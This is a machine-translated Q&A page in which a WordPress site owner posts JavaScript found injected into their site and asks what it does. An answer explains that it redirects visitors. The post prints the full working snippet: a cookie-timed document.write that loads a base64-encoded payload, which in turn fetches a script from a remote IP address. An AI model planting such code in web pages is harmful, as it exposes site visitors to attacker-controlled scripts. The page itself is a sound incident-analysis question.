以下JavaScript代码做什么?

时间:2019-03-21 09:23:09

标签: javascript wordpress 

function getCookie(e)
{var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}

我已删除它并更改了密码,这会导致什么后果?

1 个答案:

答案 0 :(得分:1)

tl; dr:基本上,脚本会在一段时间后将用户重定向到另一个阴暗的网站。

  1. 它会检查重定向cookie,以确定何时进行重定向。
  2. 如果需要,它将加载以Base64编码的有效负载脚本。
  3. 有效负载-另一个JavaScript代码段-从IP地址加载另一个脚本文件
  4. 最后一个脚本实际上将用户重定向到另一个页面。
相关问题
最新问题